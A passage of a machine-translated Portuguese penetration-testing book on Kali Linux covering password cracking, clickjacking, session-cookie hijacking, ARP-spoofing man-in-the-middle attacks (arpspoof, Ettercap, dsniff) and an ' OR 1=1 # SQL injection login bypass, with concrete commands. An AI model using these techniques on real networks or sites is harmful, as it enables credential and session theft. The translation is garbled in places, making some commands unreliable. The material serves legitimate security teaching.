quebrar uma senha. RainbowCrack uma aplicao decente, no entanto, h muitos
Rainbow Tables gratuitos disponveis para download, como www.freerainbowtables.com.
A figura a seguir mostra a RainbowCrack tela inicial:
RainbowCrack (rcracki_mt)
[172]
Captulo 4
findmyhash
findmyhash um script Python, que usa um servio online gratuito para quebrar hashes.
Voc deve ter acesso Internet antes de usar esta ferramenta. A figura a seguir
espetculos findmyhash a execuo de um hash MD5 contra vrios sites:
phrasendrescher um passe frase processamento multi-modular e rachaduras ferramenta.
phrasendrescher vem com uma srie de plugins, bem como API que permite
desenvolvimento de novos plugins.
phrasendrescher
CmosPwd
CmosPwd usado para quebrar a BIOS (Bsico Input Output System) senha.
CmosPwd permite apagar / kill, backup e restaurar o CMOS.
[173]
Ataques do lado do cliente
creddump
creddump uma ferramenta de python para extrair vrias credenciais e segredos do Windows
ramos de registo. creddump pode extrair LM e NT hashes (SYSKEY protegida), armazenada em cache
senhas de domnio e segredos LSA.
Resumo
Os sistemas host so uma fonte autorizada que acessar aplicaes web. Comprometedor
um recurso autorizado poderia dar um verificador da penetrao aprovado acesso a um alvo
aplicao web. Este conceito muitas vezes esquecido quando Teste de Invaso
aplicaes web.
Neste captulo, abordamos vrios mtodos para obter acesso no autorizado ao anfitrio
sistemas. O foco est usando engenharia social, identificando os hosts vulnerveis e
rachaduras senhas. H muitos livros disponveis que incidem sobre hacking anfitrio
sistemas, que poderiam ser teis quando alavancado com os temas abordados neste livro.
Ns limitado o escopo deste captulo para a segmentao de hosts, especificamente, que o acesso
web
aplicaes.
O prximo captulo ir cobrir atacando como anfitries autenticar para aplicaes web.
[174]
Atacando Autenticao
Autenticao o ato de confirmao da confiana da prpria identidade. Isso pode envolver
confirmar a identidade de uma pessoa, programa ou hardware, tais como a verificao Joseph
Muniz um funcionrio do governo, bem como o seu laptop emitido pelo governo
agncia. Como um verificador da penetrao, valioso para ser capaz de ganhar a confiana de um
sistema de
e segurana de bypass como uma entidade autorizada.
O Certified Information Systems Security Professional Currculo (CISSP)
classifica a autenticao baseada em trs tipos de fator, como segue:



Algo que voc sabe, como um PIN ou palavra-passe
Algo que voc tem, como um carto inteligente
Algo que voc , como uma impresso digital
O mtodo mais comum pelo qual as pessoas confirmar a sua identidade est usando algo
eles sabem, como uma senha. Ns cobrimos vrias maneiras para quebrar senhas em
Captulo 4, Ataques lado do cliente, ao atacar sistemas host. Rachando uma senha
vai te dar acesso a alguns sistemas no entanto, muitos alvos ir alavancar multifatorial
autenticao, ou seja, uma combinao de passos de autenticao para provar sua identidade.
comum que a autenticao do usurio envolve o uso de um nome de usurio e senha
combinao. Torna-se complicado para um usurio para inserir essas informaes a cada
tempo de autenticao necessria. Para superar isso, single sign-on foi criado como um
significa para autenticar uma a uma autoridade central que tem a confiana de outros sites.
A autoridade central ir verificar a confiana em nome do usurio ou dispositivo, de modo que o
usurio pode
acesso mltiplo sistemas protegidos, sem ter que ser solicitado em cada segurana
gateway. A autoridade comum de confiana um controlador de domnio do Windows, fornecendo
autenticao para usurios internos para recursos da intranet. Em tais casos, comprometendo
uma autoridade confivel ou uma conta com privilgios elevados pode significar o acesso a muitos
outros
recursos internos deste tipo de sistema.
Atacando Autenticao
Muitos rgos do governo alavancar um Verificao de Identidade Pessoal (PIV) ou
Carto de Acesso Comum (CAC), juntamente com uma senha, para atender os usurios tm algo
e saber. comum que os trabalhadores remotos para usar um token digital que produz
um nmero fresco a cada poucos segundos, juntamente com um PIN para representar algo que
ter e saber. Locais fsicos de alta segurana pode exigir a digitalizao de impresses digitais
junto com PIN para acesso. Tecnologia de controle de acesso de rede pode verificar como a
usurio autenticado em um computador porttil, bem como procurar um certificado escondido para
verificar
a identidade do sistema e do usurio antes de fornecer recursos de rede. crtico
identificar o mtodo de autenticao usado pelo seu alvo durante o reconhecimento
fase de um teste de penetrao, assim voc pode planejar uma estratgia para contornar essa
confiana.
O foco deste captulo em torno de como os usurios e dispositivos de autenticao para web
aplicaes com o objetivo de comprometer essa confiana. Vamos comear atacando o
processo de gerenciamento de sesses de autenticao, que como a confiana estabelecida entre
o cliente e o servidor. Em seguida, vamos nos concentrar nos clientes, atacando como os dados so
armazenados
em sistemas host atravs de uma gesto cookie. A partir da, vamos olhar para esconder em
entre o cliente eo servidor utilizando tcnicas de ataque man-in-the-middle. A ltima
tpicos sero identificar e explorar a fraqueza na forma como aplicaes web aceitar
dados de autenticao atravs de SQL e cross-site scripting (XSS).
[176]
Captulo 5
Atacar o gerenciamento de sesses
Autenticao e gerenciamento de sesso compem todos os aspectos da manipulao de usurio
autenticao e gerenciamento de sesses ativas. Com relao s aplicaes web,
uma sesso o perodo de tempo que os usurios gastam em um site. A melhor prtica a gesto
sesses autorizadas (isto , o que voc tem permisso para acessar), com base em como as
pessoas
e dispositivos de autenticao, bem como, controlar o que e quanto tempo os recursos
esto disponveis durante a sesso ativa. Isso faz com que a autenticao um aspecto fundamental
da
gerenciamento de sesses autorizadas.
O objetivo de um verificador da penetrao identificar contas que so permitidos o acesso a
sesses com privilgios de alto nvel, e tempo ilimitado para acessar o aplicativo web.
por isso que os recursos de segurana de gerenciamento de sesso, como intervalos de tempo
limite da sesso
e certificados SSL, foram criados. De qualquer forma, as ferramentas disponveis em Kali pode
identificar
falhas na forma como as sesses so gerenciados, como a captura de uma sesso ativa em uma web
Sair ps aplicao de usurio e usar a sesso para outra pessoa (tambm conhecido
como um ataque de fixao de sesso).
Ataques de gerenciamento de sesso pode ocorrer usando vulnerabilidades em aplicaes ou como
usurios acessar e autenticar para essas aplicaes. Formas comuns atacantes fazer isso
atravs de cross-site scripting ou ataques de injeo de SQL para um servidor web, o que ser
coberto mais tarde neste captulo. Os invasores tambm podem tirar proveito de cookies de sesso
em
navegadores da web ou vulnerabilidades em pginas web para alcanar resultados semelhantes.
Vamos comear
olhando para uma tcnica usada para enganar os usurios para que divulguem informaes
sensveis, ou
expondo-se a ataques atravs de hiperlinks e iFrames modificadas.
Clickjacking
Clickjacking uma tcnica onde um atacante engana um usurio a clicar em algo
alm do que eles acreditam que esto clicando. Clickjacking pode ser usado para revelar
informaes confidenciais, como as credenciais de login, bem como permitir uma
invasor assuma o controle do computador da vtima. Clickjacking geralmente expe um
problema de segurana navegador ou vulnerabilidade usando o cdigo incorporado ou script que
executado sem o conhecimento da vtima. Um exemplo de realizao de clickjacking
tendo o texto do hiperlink para um site confivel diferente do que o prprio site. A mdia
usurio no verificar antes de clicar em hiperlinks, ou avisos mudanas associadas com
tentativas clickjacking comuns, tornando esta uma forma muito eficaz de ataque.
No exemplo a seguir, o usurio ver Visite-nos no Facebook.com No entanto, quando
clicar no texto, eles vo realmente ser redirecionado para www.badfacebook.com.
<a href="http://www.badfacebook.com"> Visite-nos em Facebook.com </ a>
[177]
Atacando Autenticao
Clickjacking pode ser mais malicioso e complicado do que mudar hiperlinks.
Os atacantes que usam clickjacking iFrames normalmente incorporar em uma pgina web. O contedo
dos iFrames contm dados do site de destino e, geralmente, colocado sobre um
ligao legtimo o que torna difcil de detectar.
Para criar o seu prprio ataque de clickjacking, voc pode usar a ferramenta por clickjacking Paul
Stone,
que pode ser baixado em: http://www.contextis.com/research/tools/
clickjacking-ferramenta /.
Depois de ter baixado a ferramenta, voc pode us-lo para ter o cdigo de outro
site, como um boto de voto ou como um boto. A ferramenta funciona com clickjacking
Firefox 3.6. A ferramenta por Paul Stone no ir funcionar com verses mais recentes do Firefox;
no entanto, voc pode executar vrias verses do Firefox no arsenal incluindo Kali
Firefox 3.6 ou mais.
Website cdigo muitas vezes muda, por isso certifique-se de ajustar os seus ataques
para
acomodar atualizaes que espelham o site confivel.
Cookies de sesso Sequestro web
Cookies so um pequeno pedao de dados enviados de um site e armazenado em uma teia de
usurio
navegador enquanto o usurio est acessando o site. O site pode usar um cookie para
verificar o retorno do usurio para o site e obter informaes sobre o usurio do anterior
atividade. Isso pode incluir as pginas que foram acessadas, como logado, eo que
botes foram pressionados. Toda vez que voc entrar em um site, como o Facebook, Gmail, ou
Wordpress, o seu browser atribui-lhe um biscoito.
[178]
Captulo 5
Os cookies podem incluir a histria de rastreamento dos usurios por longos perodos de tempo,
incluindo
comportamento em um site de anos atrs. Os cookies tambm podem armazenar senhas e valores
do formulrio
um usurio tenha previamente preenchido, tal como seu endereo ou nmero de carto de crdito.
Este
til para as empresas, tais como varejo olhando para proporcionar uma experincia simplificada
para os consumidores. Um token de sesso entregue a partir de um servidor web a qualquer hora
uma srie
autentica. O sinal de sesso usada como uma forma de reconhecer entre diferentes
ligaes. Seqestro de sesso ocorre quando um atacante captura um token de sesso e
injeta-lo em seu prprio navegador para ter acesso a sesso autenticada da vtima.
Essencialmente, o ato de substituir bolinho no autorizado de um atacante com uma vtima
bolinho autorizado.
Existem algumas limitaes de ataques de seqestro de sesso:
Roubar cookies intil se o alvo est usando https:// para a navegao, e
criptografia end-to-end est habilitado. A adoo tem sido lenta, no entanto, a maioria
sites seguros fornecer essa defesa contra ataques de seqestro de sesso.
Voc pode usar sslstrip como um mtodo para impedir que o seu alvo de estabelecer
uma https conectar antes de lanar um sequestro de sesso ou outro ataque. Ver
Captulo 3, os ataques do lado do servidor, para mais informaes sobre sslstrip.
A maioria dos cookies expiram quando o alvo fizer fora de uma sesso. Este tambm
registra
o atacante fora da sesso. Este um problema para alguns aplicativos mveis que
biscoitos de alavancagem que no expiram, ou seja, um atacante pode obter acesso
para a vida, se um token de sesso vlido capturado.
Muitos Web site no suportam logins paralelas, que nega o uso de um
bolinho roubado.
Sesso de Ferramentas
Web
A prxima seo ir cobrir as ferramentas utilizadas para sesses web de teste de
penetrao.
Algumas ferramentas no esto disponveis em Kali1.0, no entanto, elas podem ser obtidas
em linha.
[179]
Atacando Autenticao
Plugins do Firefox
O mtodo manual para realizar um sequestro sesso est roubando a autenticao da vtima
cookie. Uma maneira de conseguir isso a injeo de um script em um web comprometido
servidor de aplicativos to cookies so capturados sem o conhecimento da vtima. A partir de
l, o atacante pode colher os cookies de autenticao e usar uma ferramenta de cookie injetor
para substituir o cookie do atacante com um cookie roubado autorizado. Outros mtodos utilizados
para roubar cookies so packet sniffing, o trfego de rede e comprometer hosts. Roubo
cookies sero abordados mais adiante neste livro.
O navegador Firefox oferece muitos encaixes que podem ser utilizados para injectar biscoitos
roubados
no navegador de um atacante. Alguns exemplos so GreaseMonkey, Cookie Manager e
Firesheep. Sugerimos navegar na marketplace de plugins do Firefox para vrios biscoitos
ofertas de gerenciamento para atender s suas exigncias de penetrao.
Firefox e todos os plugins associados no so instalados por padro
Kali em Linux 1.0.
Firesheep - Plugin do Firefox
Firesheep uma ferramenta clssica Teste de Invaso usado para auditar sesses web. Firesheep
uma extenso para o navegador Firefox, no entanto, algumas verses tm sido
instvel com recentes lanamentos do Firefox. Firesheep atua como um farejador de pacotes que
intercepta
os cookies no criptografados de sites, enquanto que transmitem atravs de uma rede.
Plugin do Firesheep para o Firefox oficialmente suportado no Windows e
MAC, tornando-se incmoda para operar em Linux. Trabalho feito sob encomenda pode ser
usado para fazer Firesheep operacional num ambiente Linux, no entanto,
Recomenda-se a utilizao de uma ferramenta mais actual.
Web Developer - Plugin do Firefox
Web Developer uma extenso para Firefox que adiciona ferramentas de edio e depurao para
desenvolvedores web. Web Developer pode ser baixado gratuitamente a partir do plugin do Firefox
loja. Uma caracterstica em Web Developer til para seqestro de sesso a capacidade de editar
cookies. Isto pode ser encontrado como uma opo de drop-down a partir do navegador Firefox uma
vez
Web Developer instalado, como mostrado na imagem seguinte:
[180]
Captulo 5
Selecionar Ver Informaes Cookie, e voc vai ver os cookies armazenados. Voc pode clicar
em Editar Cookies para abrir o editor de cookie e substituir o cookie atual com um
biscoito roubado da vtima.
Greasemonkey - Plugin do Firefox
[181]
Atacando Autenticao
Greasemonkey um plugin do Firefox que permite aos usurios instalar scripts que fazem no
voar alteraes no contedo da pgina web antes ou depois que a pgina carregada.
Greasemonkey
pode ser usado para personalizar uma aparncia pgina web, as funes da web, a depurao,
combinando dados a partir de outras pginas, bem como outros fins. Greasemonkey
necessrio para fazer outras ferramentas, tais como cookies Injector, funcionar corretamente.
Biscoito Injector - Plugin do Firefox
Biscoito Injector um script de usurio que simplifica o processo de manipulao de navegador
cookies. H uma srie de etapas manuais para importar um cookie de uma ferramenta como o
Wireshark
em um navegador web. Biscoito Injector permite ao usurio copiar e colar uma parte do bolinho de
um lixo, e ter os cookies do despejo criado automaticamente no momento
visto pgina web.
Voc deve ter Greasemonkey instalado para utilizar o script Injector Cookie.
Para instalar cookies Injector, pesquisa no Google para Biscoito Injector para abrir um download
ligao para o script. Quando voc selecionar o download de Cookies Injector, Greasemonkey ir
pop-up, o que levou a sua aprovao para a instalao.
Depois de instalar o script de Cookies Injector, pressione Alt + C para exibir o dilogo cookie.
Cole uma string Wireshark copiado na caixa de entrada e clique em Ok para injetar os cookies
na pgina atual. Veja o Wireshark seo sobre como copiar os cookies for Cookie
Injector utilizando Copy, Bytes, e selecione Somente Texto para impresso no Wireshark. O prximo
duas imagens mostram prementes Alt + C, colando um Dump Wireshark Cookie, e
clique Ok para ver o pop-up que os cookies capturados foram escritos no
Navegador da Internet.
[182]
Captulo 5
Os cookies Gestor + - Plugin do Firefox
Os cookies Gestor + um utilitrio usado para visualizar, editar e criar novos cookies. Biscoito
Gerente + mostra informaes detalhadas sobre cookies, bem como pode editar mltipla
biscoitos de uma vez. Cookie Manager + tambm pode fazer backup e restaurar os cookies. Voc
pode
baixar Cookie Manager + a partir da loja plugin do Firefox.
Uma vez instalado, Cookie Manager + pode ser acessado em Ferramentas, seleccionando
Os cookies Gestor +.
Os cookies Gestor + ir mostrar-lhe todos os cookies capturados pelo Firefox. Voc pode rolar
para baixo ou procurar Cookie (s) especfico para visualizar e / ou editar. No meu exemplo, eu
estou
procura de qualquer cookie associado www.thesecurityblogger.com.
[183]
Atacando Autenticao
Os cookies Gestor + torna fcil editar os cookies existentes. Isto pode ser til para
realizao de vrios tipos de ataques, como seqestro de sesso e injeo de SQL.
Biscoito Cadger
Biscoito Cadger uma ferramenta de teste de penetrao usado para auditar sesses web. Biscoito
Cadger pode incluir solicitao HTTP detalhada captura e reproduo de HTTP inseguro
Requisies GET, como itens solicitados, agentes de utilizador, referrer e autorizao bsico.
Biscoito Cadger pode fornecer uma anlise ao vivo para Wi-Fi e redes com fio, bem como
carga de captura de pacotes arquivos (PCAP). Biscoito Cadger tambm inclui deteco de sesso
para
determinar se o usurio est conectado em pginas web como Wordpress e Facebook. Biscoito
Cadger considerado por alguns como Firesheep em esterides.
O Biscoito Cadger no vem com Kali 1.0.
Biscoito Cadger pode ser baixado a partir de www.cookiecadger.com. O download
ser um arquivo JAR. D um duplo clique no arquivo para abri Biscoito Cadger. Um aviso ser
pop-up perguntando se voc deseja ativar a deteco de sesso. Clique em Sim, eo principal
painel ir aparecer. As prximas duas imagens mostram o Cookie Cadger 1.0
Arquivo JAR com a mensagem de aviso introduo pop-up e cookies principal
Cadger painel.
[184]
Captulo 5
Para comear, selecione a interface apropriada, e clique em Iniciar captura. Biscoito Cadger
oferece a possibilidade de tomar em mltiplas interfaces, se disponvel.
[185]
Atacando Autenticao
Biscoito Cadger pode enumerar todos os dispositivos encontrados na rede disponvel.
Por exemplo, a imagem seguinte mostra um i686 Linux usando o Firefox e Iceweasel.
Atividades recentes encontrado por Cookie Cadger exibido no texto azul para cada campo.
Voc pode visualizar detalhes sobre o local onde o anfitrio o surf, nomes como netbios e
nomes de host. Voc pode copiar os pedidos para a caixa de clipe e exportao de informaes,
tais como
informaes do usurio, e endereos MAC. Guias de filtro esto disponveis para cada seo para
zero em alvos especficos (por exemplo, apenas olhando para os domnios do Facebook).
Sempre Biscoito Cadger reconhece uma sesso de login, ele captura-lo e d a capacidade
para carregar a sesso. A imagem seguinte mostra uma captura de sesso do administrador
registrando em www.thesecurityblogger.com. Biscoito Cadger mostrar um cone e
explicar o tipo de sesso capturado. Este poderia ser um Hotmail, Facebook, ou neste
exemplo, Wordpress de login.
[186]
Captulo 5
Para ver as sesses reconhecidos, clique na aba Sesses reconhecidos
e pegar uma sesso a partir da janela, como mostrado na imagem anterior. Uma vez
realado, clique no Carregar Sesso Selecionado boto para repetir a sesso. Biscoito
Cadger ir exibir Carregando na janela inferior, e um navegador abrir logged
como o usurio durante a sesso capturado. A figura a seguir mostra abertura
um cookie de domnio capturado da vtima. Uma vez que a carga est completa, o padro
Navegador de Internet ir abrir a pgina capturada com os direitos associados ao
bolinho roubado.
Para ver as informaes de solicitao de sesso, clique com o boto direito no cone da sesso
capturado
e selecione Ver Associado Request. Isso o levar de volta para a Pedidos aba
e mostrar que sesso.
Wireshark
Wireshark um dos o protocolo de rede mais popular fonte, livre e aberto
analisadores. Wireshark pr-instalado em Kali e ideal para soluo de problemas de rede,
anlise, e para este captulo, uma ferramenta perfeita para monitorar o trfego de potenciais alvos
com o objetivo de capturar os tokens de sesso. Wireshark usa um widget toolkit GTK + para
implementar a sua interface de usurio e pcap para capturar pacotes. Ele opera de forma muito
semelhante ao
umatcpdump comando, no entanto, atuando como uma interface grfica com a classificao integrado
e opes de filtragem.
[187]
Atacando Autenticao
Wireshark pode ser encontrado em Sniffing / Spoofing |Sniffers de rede, e selecionando
Wireshark bem como sob a Top 10 Ferramentas de segurana categoria.
Para comear a capturar o trfego, selecione o Captura e separador Interfaces. Voc vai ver o
interfaces disponveis para captura. No meu exemplo, eu estou indo para selecionar eth0 clicando
em
na caixa de seleo ao lado de eth0 e selecionando Iniciar.
Voc no pode ver o trfego se a interface de rede em que voc est
captura no suporta o modo promscuo, ou porque o
OS no pode colocar a interface em modo promscuo. Mais informaes sobre o
diferentes modos de captura e soluo de problemas pode ser encontrada em
www.wireshark.org.
[188]
Captulo 5
Wireshark ir capturar todo o trfego visto no fio. O trfego pode ser filtrado, digitando
itens especficos no espao de filtrao ou por ajustamento da organizao de dados atravs do
topo
tabelas, como protocolo ou destinos.
Wireshark captura um monte de detalhes, por isso importante para filtrar por coisas especficas,
como parmetros para os cookies no garantidos como http.cookie. Por exemplo, o Gmail por
padro criptografada, no entanto, voc pode desativar o https e procurar o GX parmetro
contido numa http.cookie para identificar os cookies do Gmail no garantidos. A sequncia
imagem mostra captura o cookie de login em um blog Wordpress:
[189]
Atacando Autenticao
Uma vez que voc capturar um cookie sem garantia, voc deve usar uma outra ferramenta para
injet-lo em
seu navegador para completar o seqestro de sesso. Escolha o cookie vtimas, com o boto direito
clique na linha, e selecione Cpia |Bytes |Texto para impresso somente. Agora, voc pode colar
isso em um Injector Cookie, como o Firefox plugin do Biscoito Injector. Veja Cookies
Injector para completar o ataque seqestro de sesso em plugins do Firefox.
Voc deve ter o Greasemonkey e Cookies Injector para copiar / colar
no navegador Firefox.
Existem muitas ferramentas teis disponveis que suportam captura Wireshark e simplificar
foram encontrados dados. Um exemplo o NetWitness Investigator que pode ser baixado
gratuitamente
a partir de www.emc.com.
Hamster e Ferret
Hamster um utilitrio usado para roubar cookies com seqestro de sesso HTTP com passivo
sniffing tambm conhecido como Sidejacking. Hamster escuta em uma rede, captura qualquer
cookies de sesso visto, e as importaes roubado biscoitos em um ambiente GUI navegador para
o atacante pode repetir a sesso. Hamster usa Ferret para pegar cookies de sesso.
Hamster pode ser acessado por navegar para Sniffing / Spoofing |WebSniffers e
selecionando Hamster.
Quando voc inicia Hamster, um Terminal abrir o incio do servio de Hamster. O
IP proxy padro ser 127.0.0.1:1234.
Voc pode acessar Hamster abrindo um navegador e navegar para
http://127.0.0.1:1234.
[190]
Captulo 5
O trfego deve viajar atravs do hamster para que ele faa o seu trabalho. Voc pode selecionar qual
adaptador
usar clicando no link adaptadores. Para o meu exemplo, eu estou indo para farejar eth0.
Hamster est redireccionado para uma pgina de atividade Sidejacking. Voc vai notar que no so
receber quaisquer pacotes. Hamster precisa de um sniffer para pegar trnsito. Voc pode usar Ferret
acessando Sniffing / Spoofing |Sniffers Web e selecionando Ferret. ATerminal
janela pop-up com algumas opes. Digite furo-i INTERFACE para selecionar
a interface para farejar com Ferret. Ferret ir dizer-lhe que est cheirando eo comando
aviso ir pendurar em um estado de execuo. Como voc pode ver o trfego, a captura de trfego
ser exibida
como texto em Ferret.
[191]
Atacando Autenticao
Uma vez Ferret est em execuo, navegar de volta para Hamster, e voc deve comear a
veja pacotes. Todas as metas da rede aparecer. Clique em um alvo para ver
biscoitos capturadas.
Clique em qualquer cookie para acessar a sesso de captura. No meu exemplo, eu repetir
acessando
www.thesecurityblogger.com.
[192]
Captulo 5
Man-in-the-middle ataque
Um ataque man-in-the-middle uma forma de escuta ativa em que o atacante
faz uma conexo com as vtimas e retransmite mensagens entre as vtimas, tornando-os
acredito que eles esto falando diretamente para o outro. H muitas formas de este ataque,
como o uso de um roteador sem fio Hak5 abacaxi que pretende ser uma rede sem fio confivel
ponto de acesso, enquanto realmente agindo como um man-in-the-middle entre vtima e
rede sem fio. Outro exemplo usar Kali para encaminhar o trfego entre uma vtima
eo roteador padro, enquanto sniffing para informaes teis, tais como credenciais de login.
Muitos servios em nuvem como o Facebook eo Gmail alavancagem login seguro
via HTTPS, o que impede um ataque genrico man-in-the-middle. Para ignorar
HTTP seguro, voc pode usar sslstrip, que ir revelar todas as informaes de login
ao seu ataque man-in-the-middle. O sslstrip / man-in-the-middle
combinao um mtodo muito eficaz para roubar credenciais de login da vtima, se
voc tem um sistema de ataque na mesma rede que o sistema (s) alvo.
dsniff e arpspoof
dsniff um conjunto de senha sniffing e ferramentas de anlise de trfego de rede projetados
para
analisar diferentes protocolos de aplicao e extrair informaes relevantes.
arpspoof usada quando um atacante envia falso Address Resolution Protocol (ARP)
mensagens em uma rede de rea local. O objetivo deste processo associar o
endereo MAC do atacante com o endereo IP de outro host, fazendo com que todo o trfego
voltados para o endereo de IP para ser enviado para o atacante vez.
Um mtodo manual para realizar uma man-in-the-middle est usando arpspoof e dsniff
a sentar-se entre os sistemas. O primeiro passo identificar o endereo IP da sua vtima
eo gateway padro da rede, utilizando tcnicas de Captulo 2, Reconnaissance
- Conceitos Bsicos, Depois de saber os endereos de IP, voc precisa dizer a sua vtima voc
so realmente um outro sistema ou o gateway padro. Por exemplo, se uma vtima
172.16.76.128, o gateway padro 172.16.76.2 eo invasor 172.16.76.131,
voc deve definir o seu endereo IP 131 para se parecer com a vtima e gateway padro usando
o comando arpspoof.
Abrir dois Terminal janelas e digite os seguintes comandos em cada janela para
falsificar suas vtimas:
[193]
Atacando Autenticao
TERMINAL 1:
arpspoof-t 172.16.76.128 172.16.76.2 / / diz vtima 2 voc o
gateway padro
TERMINAL 2:
arpspoof-t 172.16.76.2 172.16.76.128 / / diz vtima 1 voc o
gateway padro
Se voc digitar os comandos corretamente, voc deve ver que o trfego est sendo reproduzido
atravs do sistema de ataque. Trfego no est indo para e da vtima, de modo a
vtima no iria ver o trfego que vai para fora da rede neste momento. Para completar o
ataque, voc precisa habilitar IP para frente para que o trfego continuar a fluir a partir do padro
porta de entrada para a vtima e vice-versa, enquanto o atacante est observando o trfego entre
a vtima eo gateway padro.
Abra um tero Terminal janela e digite:
echo 1> / proc/sys/net/ipv4/ip_forward
Neste ponto, o trfego deve fluir entre a vtima eo gateway padro, enquanto
indo atravs do sistema invasor. A figura a seguir mostra o de ping falhar
enquanto para a frente IP no est habilitado.
[194]
Captulo 5
Em seguida, lanar dsniff para assistir ao trfego. dsniff pode ser encontrado em Sniffing / Spoofing
|Sniffers de rede, e selecionando dsniff. ATerminal janela ser aberta, exibindo
os comandos de uso para dsniff, como mostrado na imagem seguinte:
Para iniciar dsniff, tipo dsniff e selecione a interface para farejar usando -I e a
interface. Para o meu exemplo, eu digitei dsniff para capturar todo o trfego em eth0 como
mostrado
na imagem seguinte:
dsniff vai pegar todas as informaes de login. Se a vtima registra em um sistema via FTP para
exemplo, voc vai ver a tentativa de login e credenciais uma vez que a sesso fechada,
porque dsniff precisa ver toda a sesso.
[195]
Atacando Autenticao
Ettercap
Ettercap um conjunto abrangente livre e de cdigo aberto para o man-in-the-middle baseados-
ataques.
Ettercap pode ser usado para anlise de protocolo de rede de computadores e auditoria de
segurana,
com sniffing conexes ao vivo, filtragem de contedo e suporte para ativa e passiva
disseco de vrios protocolos. Ettercap trabalha pondo rede do atacante
interface em modo promscuo e ARP para o envenenamento das mquinas vtima.
Para iniciar Ettercap, navegue at Sniffing / Spoofing |Sniffers de rede e selecione
o Ettercap grfica.
O primeiro passo selecionar qual interface voc pretende farejar. Navegue at a Farejar tab,
selecionar o tipo de sniffing (Unified sniffing ou Sniffing em ponte) ea interface voc planeja
para farejar.
[196]
Captulo 5
Agora, Ettercap vai mostrar mais opes de menu, como mostrado na imagem seguinte:
Vamos verificar a rede para hosts disponveis. Navegue para os Hosts e selecione Digitalizar para
hospedeiros. Ettercap rapidamente digitalizar toda a classe Ce listar todos os hosts identificados.
Geralmente
o roteador o primeiro anfitrio que se encontra. A figura a seguir mostra quatro dispositivos
encontrado durante uma verificao.
Neste exemplo, encontramos quatro dispositivos. Podemos supor .1 o roteador, e ns
ser alvo da mquina da vtima 0,128. Vamos selecionar o roteador para Meta 1 e
a vtima 0,128 para Meta 2. Isto ir colocar o nosso sistema entre a vtima
e um roteador para um ataque clssico man-in-the-middle. Selecione cada alvo, e clique no
caixa de seleo apropriada. Voc pode verificar as metas, navegando at Alvos e
selecionando Alvos atuais.
[197]
Atacando Autenticao
Em seguida, podemos olhar para as opes de man-in-the-middle encontradas embaixo da aba
MITM.
H opes para Envenenamento ... Arp, ICMP redirecionar ..., Port roubar ..., e Dhcp
spoofing .... Para este exemplo, vamos selecionar Arp envenenamento ... e escolher o Farejar
conexes remotas parmetro.
Agora, estamos prontos para capturar o trfego entre o roteador e nosso vtima. Interessante
informaes, tais como nome de usurio e senha, podem ser capturados e
exibido na janela de execuo.
Emalhe
Emalhe uma ferramenta de man-in-the-middle usado para capturar imagens de trfego de rede ao
vivo.
Emalhe exige um ataque man-in-the-middle a ser estabelecido antes de trabalhar. Voc
pode aproveitar a arpspoof e dsniff ou mtodos Etthercap anteriormente coberto para
lanar o seu ataque man-in-the-middle antes de lanar redes de deriva. Emalhe pode ser
executados simultaneamente para dar-lhe rapidamente a visibilidade de todas as imagens voando
o fio.
[198]
Captulo 5
Emalhe pode ser encontrado em Sniffing / Spoofing |Sniffers Web e selecionando
Emalhe. Emalhe abrir como um Terminal mostrando como usar a ferramenta. Voc ir
precisa especificar qual interface voc quer cheirar eo que voc quer fazer com
imagens captadas fora do fio. Por exemplo, voc pode optar por ter um sinal sonoro
para cada imagem usando o -B imagens de comando, exibio na tela do terminal, ou
enviar imagens capturadas para um diretrio. A captura de tela fornecido mostra um exemplo de
a captura de imagens a partir de eth0 e colocando as imagens em uma pasta localizada no / Root /
Desktop / CapturedImages.
O exemplo a seguir supe um ataque existente man-in-the-middle
estabelecida usando eth0 como a porta de escuta.
Depois de emalhe lanado, um separado em branco Terminal janela pop-up. Se voc
ter dito emalhe para exibir imagens, eles aparecero nesta janela. Se voc selecionou
no para exibir imagens, como o uso -Um, As imagens no aparecem, no entanto, ser enviados para
a pasta especificada no comando de execuo. A imagem seguinte emalhe
a captura de imagens a partir de um surf vtima www.drchaos.com.
[199]
Atacando Autenticao
SQL Injection
Um banco de dados armazena dados e organiza-lo em algum tipo de forma lgica. Oracle e
Microsoft SQL so exemplos populares de sistemas de gerenciamento de banco de dados que
permitem
usurios para criar vrios tipos de bancos de dados usados para armazenar, consultar e organizar
dados
de forma criativa.
Structured Query Language, que mais conhecido como SQL, o sublinhado
linguagem de programao comum que entendido pela maioria de gerenciamento de banco de
dados
sistemas. Ele fornece uma maneira comum para a aplicao para acessar os dados no banco de
dados
usando um conjunto comum de comandos no banco de dados pode entender.
Os atacantes exploram esses bancos de dados, tornando-os informaes de sada que
no devem ser visualizadas. s vezes, isso to simples como o atacante pedindo
informaes privilegiadas do sistema de gerenciamento de banco de dados. Outras vezes,
aproveitando configuraes pobres por administradores de banco de dados. Atacantes podem
tambm tirar proveito de uma vulnerabilidade no sistema de gerenciamento de banco de dados que
permite que o invasor ver ou escrever comandos privilegiados de e para o banco de dados.
Atacantes tipicamente enviar cdigo malicioso atravs de formulrios ou de outras partes de uma
pgina web
que tm a capacidade de aceitar a entrada do usurio. Por exemplo, um atacante pode entrar
aleatria
personagens, bem como as declaraes de comprimento, com o objetivo de identificar a fraqueza na
forma como
as variveis de entrada e parmetros so concebidos. Se um campo de entrada est definido para
aceitar apenas
usernames at 15 caracteres, uma mensagem de erro pode aparecer revelando detalhes
sobre como o banco de dados est configurado.
O plugin de Firefox HackBar vai deixar voc testar consultas SQL e injetar suas prprias consultas
para mudar solicitaes SQL. O plugin HackBar tambm ir permitir que um verificador da penetrao
examinar as informaes HTTP POST.
[200]
Captulo 5
No exemplo a seguir, vamos tentar realizar uma injeo de SQL no site
DrChaos.com. Vamos navegar para www.DrChaos.com usando o Firefox em nosso Kali
console do servidor e tentar entrar no site. Primeiro, vamos tentar o nome de usurio
administrador ea senha 12345 se autenticar. Voc ver que ir falhar.
Agora, navegue at o Vista barra de menus no Firefox e selecione o HackBar menu. Clique
o Carga URL boto e clique no Ativar dados Postar boto. Voc vai ver a URL que
foram entrando em, bem como o nome de usurio e senha que apenas tentada.
[201]
Atacando Autenticao
Vamos agora adicionar uma aspa simples aps o nome do usurio administrador. Assim que
clicamos na Executar boto, ns recebemos uma injeo de SQL. Isso pode significar o servidor
vulnervel a injeo de SQL, porque o servidor est respondendo a erros de SQL.
Vamos colocar em injeo SQL, adicionando um OR 1 = 1 # # declarao no final de
a linha.
Uma vez que executar o cdigo, que est conectado como administrador para www.drchaos.com.
[202]
Captulo 5
Temos remendado www.DrChaos.com para que ele no vulnervel a este ataque.
